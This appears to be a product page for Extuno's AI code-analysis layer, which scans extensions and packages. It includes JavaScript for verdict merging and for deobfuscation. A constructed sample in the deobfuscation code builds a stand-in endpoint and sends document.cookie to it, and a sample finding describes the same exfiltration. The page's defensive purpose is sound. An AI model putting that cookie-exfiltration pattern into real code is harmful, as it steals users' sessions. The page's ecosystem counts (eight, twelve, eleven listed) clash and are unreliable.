AI code analysis that reads and explains the source
Extuno's AI layer reads the full source of an extension or package, correlates behavior across versions, decodes lightly-obfuscated logic, and writes plain explanations of why a finding matters. It runs alongside the rule engine and the sandbox, and it never overrides their verdict.
What does the AI layer actually do?
The AI layer reads the complete source of an extension or package, not just the lines a rule already flagged. It follows data from where it is collected to where it leaves the code, ties together pieces that sit in different files, and decodes lightly-obfuscated logic such as string concatenation, hex escapes, and base64 wrappers that hide an endpoint or a payload.
For each conclusion it writes a short explanation in evidence terms: the file, the line, the behavior, and why it is dangerous. This sits next to the rule-based static analysis output so an analyst reads one consistent report instead of switching between a raw match list and free text.
How does it correlate behavior across versions?
A single version can look benign while a later update introduces the dangerous step. The AI layer compares the current source against the previous version and points out where new behavior was added: a fresh network endpoint, a new code path that reads credentials, a decode step that was not there before.
This feeds the same supply-chain signal that drives version diffing. When a clean extension is poisoned through its update channel, the AI explanation names the exact change between releases, so the escalation reads as a concrete diff rather than a score that moved.
Why is the AI layer advisory only?
The verdict is owned by the rule engine and the dynamic sandbox. The AI layer adds context and explanation, but it cannot raise a finding to a hard-block on its own. This is a deliberate design choice: a model that could flip the verdict could also create a false hard-block, and a CI gate that blocks builds on a guess is worse than no gate.
So the AI output is labeled as advisory throughout the report. It enriches what static and dynamic analysis already proved, it never replaces the evidence, and a build never fails on AI text alone.
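The advisory rule above can be enforced mechanically when the three layers' findings are merged into the report. This is an added illustration, not Extuno's code: it assumes each finding carries a `source` of `rule`, `sandbox` or `ai` plus the `advisory`, `severity`, `file` and `line` fields used in the sample record on this page, and a gate threshold of high or above.

```javascript
// Added example (not Extuno's code). Only non-advisory rule/sandbox findings can
// decide the CI gate; an AI finding is attached as context to the evidence finding
// it corroborates (same file and line) and is otherwise reported but never gates.
const SEVERITY_RANK = { critical: 4, high: 3, medium: 2, low: 1 }; // assumed scale
const GATE_RANK = SEVERITY_RANK.high; // assumed threshold: block at high or above

function decideVerdict(findings) {
  // Both checks are needed: a record from the AI layer must not gate even if
  // its advisory flag was dropped or mislabelled somewhere upstream.
  const evidence = findings.filter(
    (f) => !f.advisory && (f.source === "rule" || f.source === "sandbox"));
  const block = evidence.some((f) => (SEVERITY_RANK[f.severity] || 0) >= GATE_RANK);

  const advisory = findings.filter((f) => f.advisory || f.source === "ai");
  const sameSpot = (a, f) => a.file === f.file && a.line === f.line;

  const enriched = evidence.map((f) => ({
    ...f,
    ai_context: advisory.filter((a) => sameSpot(a, f)).map((a) => a.summary),
  }));
  // AI findings with no corroborating rule/sandbox evidence stay in the report,
  // labelled advisory, and contribute nothing to the verdict.
  const advisoryOnly = advisory.filter((a) => !evidence.some((f) => sameSpot(a, f)));

  return { verdict: block ? "block" : "pass", findings: enriched, advisory_only: advisoryOnly };
}

// Constructed sample findings (ids other than the page's AI finding are placeholders).
const AI_FINDING = {
  id: "AI-CORRELATE-EXFIL-01", source: "ai", advisory: true, severity: "high",
  file: "src/bg.js", line: 212,
  summary: "Reads document.cookie, base64-encodes it, and POSTs to an assembled endpoint.",
};
const RULE_FINDING = {
  id: "RULE-PLACEHOLDER-COOKIE-POST", source: "rule", advisory: false, severity: "high",
  file: "src/bg.js", line: 212,
};

console.log(decideVerdict([AI_FINDING]).verdict);               // pass
console.log(decideVerdict([RULE_FINDING, AI_FINDING]).verdict); // block
```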
How does it handle obfuscation?
Malicious code rarely ships in clear form. The AI layer decodes the common lightly-obfuscated patterns: characters assembled with String.fromCharCode, hex and unicode escapes, base64 blobs passed to a decoder, and string fragments concatenated to hide a domain or a command.
Once the logic is readable, the AI explains what the decoded form does and which endpoint or action it points to. Heavy or layered obfuscation is also a signal in its own right, surfaced by the rule engine; the AI layer adds the readable account of what the hidden code was trying to run.
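The four light patterns named above can be folded statically, without executing anything, which is enough to recover an assembled endpoint for the analyst. The following is an added example, not Extuno's decoder: a small regex-based pass over a constructed snippet that mimics the finding on this page (the `collector.example` host and `/upload` path are the page's sample values; everything else is constructed).

```javascript
// Added example (not Extuno's code): fold lightly-obfuscated string patterns
// statically. Heuristic and regex-based, no eval, so it cannot run hidden code.

// Constructed sample in the style of the page's finding (not real extension code).
const SAMPLE = [
  'const h = "ht" + "tps://" + "col" + "lector.example";',
  'const p = String.fromCharCode(47, 117, 112, 108, 111, 97, 100);',
  'const m = "\\x50\\x4f\\x53\\x54";',
  'const t = atob("ZG9jdW1lbnQuY29va2ll");',
  'fetch(h + p, { method: m, body: t });',
].join("\n");

// String.fromCharCode(n, n, ...) with purely numeric arguments -> "literal"
function foldCharCodes(src) {
  return src.replace(/String\.fromCharCode\(([\d,\s]+)\)/g, (_, args) =>
    JSON.stringify(String.fromCharCode(...args.split(",").map(Number))));
}
// \xHH and \uHHHH escapes -> the character they encode
function foldEscapes(src) {
  return src.replace(/\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})/g,
    (_, x, u) => String.fromCharCode(parseInt(x || u, 16)));
}
// atob("...") -> the decoded literal (Buffer keeps this portable across Node versions)
function foldBase64(src) {
  return src.replace(/atob\("([A-Za-z0-9+/=]+)"\)/g, (_, b) =>
    JSON.stringify(Buffer.from(b, "base64").toString("utf8")));
}
// "a" + "b" -> "ab", repeated until nothing changes
function foldConcat(src) {
  const re = /"([^"\\]*)"\s*\+\s*"([^"\\]*)"/g;
  let prev;
  do { prev = src; src = src.replace(re, (_, a, b) => JSON.stringify(a + b)); } while (src !== prev);
  return src;
}
// const x = "literal"; -> inline x at word-bounded uses and drop the declaration.
// Naive on purpose: it does not distinguish code from string contents, and it
// shifts line numbers, so report file/line from the original source, not this output.
function inlineConsts(src) {
  const consts = [];
  src = src.replace(/const (\w+) = ("[^"\\]*");\n?/g, (_, n, lit) => { consts.push([n, lit]); return ""; });
  for (const [n, lit] of consts) src = src.replace(new RegExp(`\\b${n}\\b`, "g"), () => lit);
  return src;
}
function deobfuscate(src) {
  return foldConcat(inlineConsts(foldConcat(foldBase64(foldEscapes(foldCharCodes(src))))));
}
// Endpoints visible only after folding; these are what the explanation should name.
function findEndpoints(src) {
  return [...deobfuscate(src).matchAll(/https?:\/\/[^\s"']+/g)].map((m) => m[0]);
}
console.log(deobfuscate(SAMPLE)); // fetch("https://collector.example/upload", ...)
```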
Where does it fit in the pipeline?
A scan runs static analysis over the unpacked source, executes the extension or package in the sandbox, and runs the AI layer over the full source and the captured behavior. The three layers write into one report where every finding carries a file, a line, the reason, and the recommended action.
The full order, the inputs each layer reads, and the verdict rules are written up on the methodology page. The AI layer is the explanation and correlation step that makes the rule and sandbox output easier to act on across the eight supported ecosystems.
{
  "id": "AI-CORRELATE-EXFIL-01",
  "severity": "high",
  "advisory": true,
  "file": "src/bg.js",
  "line": 212,
  "summary": "Reads document.cookie, base64-encodes it, and POSTs to an endpoint assembled from string fragments. Endpoint and encode step were added in this version.",
  "decoded_endpoint": "https://collector.example/upload",
  "introduced_in_version": "3.4.0",
  "recommended_action": "Review the new exfiltration path against the prior release before approving the update."
}

Frequently asked questions
Can the AI layer block my CI build by itself?
No. The AI layer is advisory only. The pass or fail decision in a CI gate comes from the static rules and the sandbox verdict, never from AI text. This is why the AI layer cannot create a false hard-block on a guess.
Does the AI read my full source code?
Yes. It reads the complete source of the scanned extension or package, not only the lines a rule already matched. Reading everything is what lets it correlate behavior across files and explain decoded logic that a single pattern match would miss.
How is this different from the static rule engine?
The static engine runs over 1100 rules that match known patterns without running the code, including over 1000 secret detectors. The AI layer reads the same source to correlate behavior, decode obfuscation, and explain findings in plain terms. They run together and write one report.
Does it work on packages as well as extensions?
Yes. The AI layer runs across all twelve supported ecosystems: Chrome, Firefox, VS Code, JetBrains, Eclipse, Discord client mods, npm, PyPI, WordPress, Composer, and Maven. It reads source the same way whether the target is a browser extension or a developer package.
Will it flag a credential or API key in the source?
Secret detection is owned by the dedicated detectors in the static layer. The AI layer can describe how a credential is used or sent, and it correlates that usage with network behavior, but the secret finding itself carries the evidence and the recommended rotation action.